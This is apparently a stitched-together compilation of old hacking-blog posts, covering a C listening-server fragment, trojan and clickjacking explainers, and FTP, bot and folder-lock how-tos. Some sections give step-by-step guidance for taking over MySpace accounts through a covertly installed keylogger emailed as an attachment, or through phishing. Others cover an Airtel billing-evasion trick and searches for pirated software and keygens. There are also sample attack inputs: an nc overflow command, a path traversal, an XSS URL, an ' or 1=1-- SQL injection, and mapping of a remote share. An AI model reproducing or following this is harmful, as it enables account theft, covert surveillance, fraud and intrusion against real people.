fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

ClickJacking attacks


Definition :-
"Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages." - Wikipedia

Introduction :-

A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The long list of vulnerabilities involves browsers, Web sites and plug-ins like Flash.

How It Works? :-

ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site, Google Gadgets etc.
ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser.
So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

In other words, the attack is thrown by a malicious web page embedding objects, possibly from a different site, such as framed documents or plugin content (Flash, Silverlight, Java…) which may lead to unwanted results if clicked by the current user (e.g. a “Delete all messages” button in your webmail or an advertisement banner in a click fraud scheme). Using DHTML, and especially CSS, the attacker can disguise or hide the click target in several ways which go completely undetected by the user, who’s easily tricked into clicking it in a more or less blind way.

javascript increases the effectiveness of these attacks hugely, because it can make our invisible target constantly follow the mouse pointer, intercepting user’s first click with no failure.
We can however imagine a few less effective but still feasible scriptless scenarios, e.g. covering the whole window with hidden duplicates of the target or overlaying an attractive element of the page, likely to be clicked (e.g. a game or a porn image link), with a transparent target instance.

Examples :-

1) Malicious camera spying using Adobe's Flash.
2) Flash, Java, SilverLight, DHTML Game or Application used to Spy on your Webcam and/or Microphone.

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.


NoScript 1.8.9.2

Allow active content to run only from sites you trust,
and protect yourself against XSS and Clickjacking attacks...!

COMPLETE DETAILS ABOUT The TROJON HORSE


What is a Trojan ?
"A Trojan Horse, or Trojan, is a term used to describe malware that appears, to the user, to perform a desirable function but, in fact, facilitates unauthorized access to the user's computer system". - Wikipedia

"A Trojan horse is an apparently useful program containing hidden functions that can exploit the privileges of the user [running the program], with a resulting security threat.". - CERT Advisory

Types of Trojan :-

The different types of Trojan Horses are as follows-

1) Remote Access Trojans :- Abbreviated as RATs, a Remote Access Trojans are potentially the most damaging, designed to provide the attacker with complete control of the victim's system.

2) Data Sending Trojans :- A type of a Trojan horse that is designed to provide the attacker with sensitive data such as passwords, credit card information, log files, e-mail address or IM contact lists. They could install a keylogger and send all recorded keystrokes back to the attacker.

3) Destructive Trojans :- Once this Trojan is installed on your computer, it will begin to systematically or completely randomly delete information from your computer. This can include files, folders, registry entries, and important system files, which likely to cause the failure of your operating system.

4) Proxy Trojans :- A type of Trojan horse designed to use the victim's computer as a proxy server. This gives the attacker the opportunity to conduct illegal activities, or even to use your system to launch malicious attacks against other networks.

5) FTP Trojans :- A type of Trojan horse designed to open port 21 (FTP) and acts like an FTP server. Once installed, the attacker not only could download/upload files/programs to victim's computer but also install futher malware on your computer.

6) Security Software Disabler Trojan :- A type of Trojan horse designed stop or kill security programs such as an antivirus program or firewall without the user knowing. This Trojan type is normally combined with another type of Trojan as a payload.

7) DoS Attack Trojans :- These trojans are used by the attacker to launch a DoS/DDoS attack against some website or network or any individual. In this case they are well known as "Zombies".

How Trojan Works ?

Trojans typically consist of two parts, a client part and a server part. When a victim (unknowingly) runs a Trojan server on his machine, the attacker then uses the client part of that Trojan to connect to the server module and start using the Trojan. The protocol usually used for communications is TCP, but some Trojans' functions use other protocols, such as UDP, as well. When a Trojan server runs on a victim’s computer, it (usually) tries to hide somewhere on the computer; it then starts listening for incoming connections from the attacker on one or more ports, and attempts to modify the registry and/or use some other auto-starting method.

It is necessary for the attacker to know the victim’s IP address to connect to his/her machine. Many Trojans include the ability to mail the victim’s IP and/or message the attacker via ICQ or IRC. This system is used when the victim has a dynamic IP, that is, every time he connects to the Internet, he is assigned a different IP (most dial-up users have this). ADSL users have static IPs, meaning that in this case, the infected IP is always known to the attacker; this makes it considerably easier for an attacker to connect to your machine.

Most Trojans use an auto-starting method that allows them to restart and grant an attacker access to your machine even when you shut down your computer.

How Trojan Horses Are Installed ?

Infection from Trojans is alarmingly simple. Following are very common ways to become infected that most computer users perform on a very regular basis.
 Software Downloads
 Websites containing executable content (ActiveX control)
 Email Attachments
 Application Exploits (Flaws in a web applications)
 Social Engineering Attacks

Create An Ftp Server On Your PC


Process-1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..

1) Goto no-ip & create urself a free account.

2) Now ur account been created & ll receive ur account password via mail to ur email address.

3) After getting ur password login to ur account of no-ip.com
4.After getting logged in, click upon add a HOST its on the left menu.

5) Type any hostname u want (eg:-abc) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.

6) Now u have owned ur own static address (example: abc.serveftp.com)

7) Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..

8) After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.

9) At last tick on da check box present at the static address.

10) U have ur own static web address.


Process-2:

Installation & setting of the FTP-Server

1) You have to install Serv-U 4.1.03 , download this software from here

2) Run Serv-U & use da wizard to setup ur FTP.

3) Click on next until u have been asked for IP-Address, leave it as it is & click upon next.

4) Enter ur domain name u have registered (example: abc.serveftp.com) it above in da domain field & click upon next.

5) U ll be asked for anonymous access, select No & click upon next.

6) Next u ll be asked for creating a named account, select yes & click upon next.

7) Choose any user name u wish (eg:-xyz) & clcik upon next.

8) Enter password for dis account (eg:-adc341) for security purpose choose difficult password.

9) U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.

10) Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.

11) At last ur account has been created click finish.


Process-3:

Configuring the user accounts which u have been created.

1) On the left tree-menu, select da account which u have been created above & den click upon General Tab.

2) Goto Hide 'Hidden' Files.

3) Check Allow only and enter the number one in the box.

4) Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.

5) choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)

6) Click upon Dir Access Tab.

7) Now u can c home folder here.Highlight it & make ur permission.

8) If u want only users to download check only these Read,List & Inherit.

9) If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.

10) If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.

11) There are many things u can do, These are only the basics....

12) Your server is now ready to be connected..

13) Login with your username & password...

Create Your Own Instant Messenger Bot

-: Creating IM Bot :-

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.

To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.

For this example, I have created a dummy bot called “insecure” that listens to your IM messages. To see this live, add insecure@bot.im to your GTalk buddy list and start chatting.


f you like to write a personal IM bot, just follow these simple steps:-

Step 1: Go to www.imified.com and register a new account with a bot.

Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.

Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
<?php

switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "
from " . $_REQUEST['value2'] . ".";
break;
}

?>

Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.

Step 4: Now login to your imified account, paste the script URL

Screen Name: insecure@bot.im
Bot Script URL: http://www.insecure.in/imbot.php

Step 5: Add that im bot your friends list. That’s it.

This is a very basic bot but the possibilities are endless.

For instance, you could write a bot that will send an email to all your close friends via a simple IM message. Or you could write one that will does currency conversion.

Dangerous Google Searching Trick - How To Find Almost Everything Using Google

Using this Dangerous Searching Technique You will be able to find everything like music,movies,cracks,full softwares,games,keygens.... In short everything... So To Know More read on...

DANGEROUS SEARCHING TECHNIQUES


In this Technique I will Show you How To Find files Using Various Hosts such as rapidshare, megaupload, hotfile etc.... You can choose your favourite host that you want...

So Let's Say You want to Download a Game say "Need for speed" (or anyother thing of your choice)...

STEPWISE DESCRIPTION:

1. Go to the Site www.google.com




2. Now type "Need for Speed" .


3. Now after typing your query type "rapidshare.com/files" (without quotes) as shown below.


4. Now Click on Search and See the results. You will suprise to See the Exact Results.



This Technique can be used to download anything such as ebooks,music,movies,video songs,softwares,cracks,keygens etc....

NOTE: After the Search Results Appears Links That You Should avoid as they are a piece of Waste:
1.rapidlibrary.com
2.rsfile.com
3.fileshunt.com
4.rapidog.com

Always Prefer the Results on Page 2 .

You can similarly You can do the search for Hotfile.com


Also:
If you need links from megaupload type megaupload.com/?d= instead of rapidshare.com/files.
Tags: Useful Articles

Some Ethical Hacking eBooks


-: Hacking Exposed-5 :-


One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.

-: Internet Denial Of Service :-


Internet Denial of Service sheds light on a complex and fascinating form of computer attack that impacts the confidentiality, integrity, and availability of millions of computers worldwide. It tells the network administrator, corporate CTO, incident responder, and student how DDoS attacks are prepared and executed, how to think about DDoS, and how to arrange computer and network defenses. It also provides a suite of actions that can be taken before, during, and after an attack. Inside, you'll find comprehensive information on the each and every topic relating denial-of-service attacks.

-: Computer Viruses For Dummies :-


It offers real, practical solutions to help ordinary users keep viruses out of their e-mail in-boxes-and explains how to respond when one slips through-
* In 2003, there was a major virus attack almost every month, which cost businesses worldwide an estimated $55 billion and did untold damage to home computers.
* Explains what viruses are and how they work, profiles major anti-virus software packages, shows how to keep anti-virus software updated, and helps people adopt safer computer work habits.
* The book’s value price and compact size will make it irresistible to people who need to protect their home PC or network.

-: Hackin9 :-


This book will help you learn :-
* How to use Google to find sources of personal information and other confidential data.
* How to find information about vulnerable systems and Web services.
* How to locate publicly available network devices using Google.

Folder Lock Without Any Software

Folder Lock With Password Without Any Software-
Paste the code given below in notepad and 'Save' it as batch file (with extension '.bat').

Any name will do.
Then you see a batch file. Double click on this batch file to create a folder locker.
New folder named 'Locker' would be formed at the same location.
Now bring all the files you want to hide in the 'Locker' folder. Double click on the batch file to lock the folder namely 'Locker'.
If you want to unlock your files,double click the batch file again and you would be prompted for password.
Enter the password and enjoy access to the folder.


if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End

How to Hack a MySpace Account

MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING

With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.

1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.

2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All the them are scams.

The following are the only 2 foolproof methods to hack Myspace.
1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.
1. HOW TO HACK MYSPACE – The Easiest Way

The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.

1. What is a keylogger?

A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.

2. Where is keylogger program available?

There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.

http://www.sniperspy.com/

3. How to install a keylogger?

Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.

4. I don’t have physical access to the target computer, can I still use Sniperspy?
It doesn’t matter whether or not you have physical access to the victim’s computer.
Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.

You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.

5. What if the target user (victim) refuses to run the attached file?

Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.

6. How can a keylogger hack Myspace account?

You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.

In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.

7. Why SniperSpy is the best?



I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.

So what are you waiting for? Go grab it.

For a complete installation guide and more information on SniperSpy visit the following link:
http://www.sniperspy.com/

2. HOW TO HACK MYSPACE – Other Ways

Phishing
Phising is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.

Phishing is proved to be the most effective way to hack Myspace and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.

Increase Virtual RAM - To Make Your System Faster 100 percent works

Follow the steps given below :-

1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.

2) Click on the 'Advanced' tab.

3) Under 'Performance', click 'Settings'.

4) Then click the 'Advanced' tab on the button that pops up.

5) Under 'Virtual Memory' at the bottom, click 'Change'.

6) Click the 'Custom Size' button.

7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).

8) Click 'Set', and then exit out of all of the windows.

9) Finally, Restart your computer.

10) You now have a faster computer and 1-2GB of Virtual RAM..!

Input Validation Attacks

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.The most common input validation attacks are as follows-

1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.

2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-
/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm

3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually javascript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, “Invalid password”. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=<script%20src=...
That is, place the script tags on the URL.

4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--

Latest Airtel Hack

Now a days Airtel gives New option to the Subscriber to access Mobile Office daily @ Rs.25.00/- per day. But this is too Costly.Only 24 hours and the cost is Rs.25.00 Oh GOD!!

But I got a Trick that’s help me to Activate my Mobile Office whole 30 days only for 25.00/. Its really good.

Just follow the Trick-
1) Your account balance should be above 25.00 for the first time.

2) Activate your mobile
office by dialing *444*1#. You will Activate your Mobile Office in the Morning.

3) You got an Activation msg. Your account should deducted by Rs. 25.00/-

4) After that your can enjoy mobile office for 24 hours.

5) But for unlimited access you will do this :: Just switch off your mobile from 7.00 am to 10.00am. and your account balance should be below 25.00 /

6) Just try it enjoy the whole world only by 25.00.

I am Sure you should be Benefited. JUST TRY IT!!!!!!!!!

NetBIOS Hacking

NetBIOS stands for "Network Basic Input Output System". It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources.
By default it runs on port 139.
NetBIOS gives the various information of the computers on a network, which includes computer name, username, domain, group, and many others.....!

The NBTSTAT Command :-
NBTSTAT is the command for manually interact with NetBIOS Over TCP/IP.
All the attributes (switches) used with nbtstat command and their usage can be viewed.
At the command prompt type-
C:\Windows>nbtstat
Sample NBTSTAT Response :-
C:\>nbtstat -A 117.200.160.174

NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------
PRASANNA UNIQUE Registered
INSECURE LABS GROUP Registered
PRASANNA UNIQUE Registered
PRASANNA UNIQUE Registered
INSECURE LABS GROUP Registered

MAC Address = 86-95-55-50-00-00

An intruder could use the output from an nbtstat against your machines to begin gathering information about them.

" in above table is nothing but the username of that system."

The next step for an intruder would be to try and list the open shares on the given computer, using the net view command.
Here is an example of the Net View command-
C:\>net view \\117.200.160.174
Shared resources at \\117.200.160.174
Sharename Type Comment
----------------------------------------
C Disk Drive C:\
MySofts Disk My Softwares Collection
E Disk Drive E:\

The command was completed successfully.


This information would give the intruder a list of shares which he would then use in conjunction with the Net Use command, a command used to enable a computer to map a share to it’s local drive, below is an example of how an intruder would map the C Share to a local G: drive, which he could then browse...!
C:\>net use G: \\117.200.160.174\C
The command was completed successfully.

C:\>G:

G:\>

Network Hacking

Network Hacking is generally means gathering information about domain by using tools like Telnet, NslookUp, Ping, Tracert, Netstat, etc.It also includes OS Fingerprinting, Port Scaning and Port Surfing using various tools.

Ping :- Ping is part of ICMP (Internet Control Message Protocol) which is used to troubleshoot TCP/IP networks. So, Ping is basically a command that allows you to check whether the host is alive or not.
To ping a particular host the syntax is (at command prompt)--
c:/>ping hostname.com

example:- c:/>ping www.google.com

Various attributes used with 'Ping' command and their usage can be viewed by just typing c:/>ping at the command prompt.


Netstat :- It displays protocol statistics and current TCP/IP network connections. i.e. local address, remote address, port number, etc.
It's syntax is (at command prompt)--
c:/>netstat -n

Telnet :- Telnet is a program which runs on TCP/IP. Using it we can connect to the remote computer on particular port. When connected it grabs the daemon running on that port.
The basic syntax of Telnet is (at command prompt)--
c:/>telnet hostname.com

By default telnet connects to port 23 of remote computer.
So, the complete syntax is-
c:/>telnet www.hostname.com port

example:- c:/>telnet www.yahoo.com 21 or c:/>telnet 192.168.0.5 21


Tracert :- It is used to trace out the route taken by the certain information i.e. data packets from source to destination.
It's syntax is (at command prompt)--
c:/>tracert www.hostname.com
example:- c:/>tracert www.dl4all.com/

Here "* * * Request timed out." indicates that firewall installed on that system block the request and hence we can't obtain it's IP address.

various attributes used with tracert command and their usage can be viewed by just typing c:/>tracert at the command prompt.

The information obtained by using tracert command can be further used to find out exact operating system running on target system.

Network Hacking (Port Scanning)

Port Scanning :- Port scanning is carried out to determine a list of open ports on the remote host that have certain services or daemons running. In port scanning, the attacker connects to various TCP and UDP ports and tries to determine which ports are in listening mode.
1) TCP Ports Scanning :- Almost all port scans are based on the client sending a packet containing a particular flag to the target port of the remote system to determine whether the port is open. Following table lists the type of flags a TCP packet header can contain.
Flag Meaning
URG (urgent) This flag tells the receiver that the data pointed at by the urgent pointer required urgently.
ACK (acknowledgment) This flag is turned on whenever sender wants to acknowledge the receipt of all data send by the receiving end.
PSH (push) The data must be passed on to the application as soon as possible.
RST (reset) There has been a problem with the connection and one wants to reset the connection with another.
SYN (synchronize) If system X wants to establish TCP connection with system Y, then it sends it's own sequence number to Y, requesting that a connection be established. Such apacket is known as synchronize sequence numbers or SYN packet.
FIN (finish) If system X has finished sending all data packets and wants to end the TCP/IP connection that it has established with Y, then it sends a packet with a FIN flag to system Y.


A typical TCP/IP three way handshake can be described as follows :
1) The client sends a SYN packet to the server.
2) The server replies with a SYN packet and acknowledges the client's SYN packet by sending an ACK packet.
3) The client acknowledges the SYN sent by the server.

Different techniques of TCP port scanning are :-
1) TCP connect port scanning
2) TCP SYN scanning (half open scanning)
3) SYN/ACK scanning
4) TCP FIN scanning
5) TCP NULL scanning
6) TCP Xmas tree scanning

2) UDP Ports Scanning :- In UDP port scanning, aUDP packet is sent to each port on the target host one by one.
If the remote port is closed, then the server replies with a Port Unreachable ICMP error message. If the port is open then no such error message is generated.

3) FTP Bounce Port Scanning :- The FTP bounce port scanning technique was discovered by Hobbit. He revealed a very interesting loophole in the FTP protocol that allowed users connected to the FTP service of a particular system to connect to any port of another system. This loophole allows anonymous port scanning.

Password Hacking

Password cracking is the process of recovering secret passwords from data that has been stored in or transmitted by a computer system. A common approach is to repeatedly try guesses for the password.Most passwords can be cracked by using following techniques :

1) Hashing :- Here we will refer to the one way function (which may be either an encryption function or cryptographic hash) employed as a hash and its output as a hashed password.
If a system uses a reversible function to obscure stored passwords, exploiting that weakness can recover even 'well-chosen' passwords.
One example is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length.
LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Hash functions like SHA-512, SHA-1, and MD5 are considered impossible to invert when used correctly.


2) Guessing :- Many passwords can be guessed either by humans or by sophisticated cracking programs armed with dictionaries (dictionary based) and the user's personal information.

Not surprisingly, many users choose weak passwords, usually one related to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include:

* blank (none)
* the word "password", "passcode", "admin" and their derivatives
* the user's name or login name
* the name of their significant other or another person (loved one)
* their birthplace or date of birth
* a pet's name
* a dictionary word in any language
* automobile licence plate number
* a row of letters from a standard keyboard layout (eg, the qwerty keyboard -- qwerty itself, asdf, or qwertyuiop)
* a simple modification of one of the preceding, such as suffixing a digit or reversing the order of the letters.
and so on....

In one survery of MySpace passwords which had been phished, 3.8 percent of passwords were a single word found in a dictionary, and another 12 percent were a word plus a final digit; two-thirds of the time that digit was.
A password containing both uppercase & lowercase characters, numbers and special characters too; is a strong password and can never be guessed.


Check Your Password Strength



3) Default Passwords :- A moderately high number of local and online applications have inbuilt default passwords that have been configured by programmers during development stages of software. There are lots of applications running on the internet on which default passwords are enabled. So, it is quite easy for an attacker to enter default password and gain access to sensitive information. A list containing default passwords of some of the most popular applications is available on the internet.
Always disable or change the applications' (both online and offline) default username-password pairs.

4) Brute Force :- If all other techniques failed, then attackers uses brute force password cracking technique. Here an automatic tool is used which tries all possible combinations of available keys on the keyboard. As soon as correct password is reached it displays on the screen.This techniques takes extremely long time to complete, but password will surely cracked.
Long is the password, large is the time taken to brute force it.

5) Phishing :- This is the most effective and easily executable password cracking technique which is generally used to crack the passwords of e-mail accounts, and all those accounts where secret information or sensitive personal information is stored by user such as social networking websites, matrimonial websites, etc.
Phishing is a technique in which the attacker creates the fake login screen and send it to the victim, hoping that the victim gets fooled into entering the account username and password. As soon as victim click on "enter" or "login" login button this information reaches to the attacker using scripts or online form processors while the user(victim) is redirected to home page of e-mail service provider.
Never give reply to the messages which are demanding for your username-password, urging to be e-mail service provider.

It is possible to try to obtain the passwords through other different methods, such as social engineering, wiretapping, keystroke logging, login spoofing, dumpster diving, phishing, shoulder surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or virus, identity management system attacks (such as abuse of Self-service password reset) and compromising host security.
However, cracking usually designates a guessing attack.

Rapidshare Hack,No waiting for 15 mins

-: Rapidshare Hack :-
There are two hacks to beat Rapidshare download limits and waiting time.

1) Rapidshare Hack (For Firefox Users) :-
The hot new Firefox plug-in takes browser customization to a whole new level by letting users filter site content or change page behaviors.
The glory of open-source software is that it allows anyone with the inclination and the scripting knowledge to get under the hood and hot-rod their computing environment.
But most of the time, that advantage is available only to people with the programming skills to make the changes they want.

That's where Greasemonkey, a free plug-in for Firefox, comes in -- it simplifies hacking the browser.

Released at the end 2004, Greasemonkey is the latest in a growing arsenal of Firefox customization tools.
It changes how Web pages look and act by altering the rendering process.

http://greasemonkey.mozdev.org/

1) Install the Greasemonkey extension>>
http://downloads.mozdev.org/greasemonkey/greasemonkey_0.2.6.xpi
2) Restart Firefox
3) Go to http://rapidshare.de/files/1034529/rapidshare.user.js.html
4) Right click on rapidshare.user.js and choose "Install User Script".
5) Run FireFox.
6) From 'File' Menu click on Open File then browse to whereever you saved the 'greasemonkey.xpi' plug-in.
Open it, wait a couple seconds for the install button becomes active.
7) Click on it to install this plug-in then CLOSE FIREFOX.
8) Run FireFox again.
From the File Menu click on Open File then browse to whereever you saved the 'rapidshare.user.js'.
9) Open it.
10) Click the Tools Menu then click on Install User Script then click OK.
11) Close FireFox.

The script will let you enjoy "no wait" and multiple file downloads......!


2) Rapidshare Hack (NIC Tricks and MAC Cloning) :-
Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day.
To get around this, you need to show the rapidshare server a different IP address.
Here are some methods for doing this-

A] Short-Out the javascript:
1) Goto the page you want to download
2) Select FREE button
3) In the address bar put this- javascript:alert(c=0)
4) Click OK
5) Click OK to the pop-up box
6) Enter the captcha
7) Download Your File

B] Request a new IP address from your ISP server:
Here’s how to do it in windows:
1) Click Start
2) Click run
3) In the run box type cmd.exe and click OK
4) When the command prompt opens type the following. ENTER after each new line.
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit
5) Erase your cookies in whatever browser you are using.
6) Try the rapidshare download again.
